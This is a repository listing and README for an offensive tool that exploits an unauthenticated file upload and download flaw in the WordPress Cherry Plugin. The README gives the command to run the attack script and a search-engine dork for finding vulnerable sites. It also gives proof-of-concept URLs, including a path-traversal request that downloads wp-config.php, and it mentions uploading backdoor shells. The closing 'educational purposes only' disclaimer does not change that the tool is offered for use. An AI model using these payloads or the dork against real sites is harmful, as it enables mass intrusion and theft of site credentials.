https://github.com/inmymine7/cherry-plugin
The cherry plugin WordPress plugin was affected by an unauthenticated file upload and download vulnerability, allowing attackers to upload and download arbitrary files. This could result in attacker uploading backdoor shell scripts or downloading the wp-config.php file.
https://github.com/inmymine7/cherry-plugin
cherry-plugins plugins-wordpress worpress-plugin
Last synced: 3 months ago
JSON representation
The cherry plugin WordPress plugin was affected by an unauthenticated file upload and download vulnerability, allowing attackers to upload and download arbitrary files. This could result in attacker uploading backdoor shell scripts or downloading the wp-config.php file.
- Host: GitHub
- URL: https://github.com/inmymine7/cherry-plugin
- Owner: InMyMine7
- Created: 2023-05-21T19:35:53.000Z (about 2 years ago)
- Default Branch: main
- Last Pushed: 2023-05-25T02:08:05.000Z (about 2 years ago)
- Last Synced: 2025-01-12T15:09:49.293Z (5 months ago)
- Topics: cherry-plugins, plugins-wordpress, worpress-plugin
- Language: PHP
- Homepage:
- Size: 26.4 KB
- Stars: 2
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# WordPress (CMS) Cherry-Plugin Arbitrary File Upload RCE
Requirement :
- `Python 2.7.18`
- `pip 19.2.3`
How To Usage :
```
python2 sxc.py
```
Example Dork
```
inurl:/wp-content/plugins/cherry-plugin/
```
Proof of Concept
```
Upload: The following file was affected: https://www.example.com/wp-content/plugins/cherry-plugin/admin/import-export/upload.php
Download: https://example.com/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php
```
Classification
`Type : UPLOAD`
`CWE : CWE-434`
**DISCLAIMER : THIS TOOLS IS FOR EDUCATIONAL PURPOSES ONLY.
AND WE DO NOT CONDONE ANY ILLEGAL ACTIVITIES**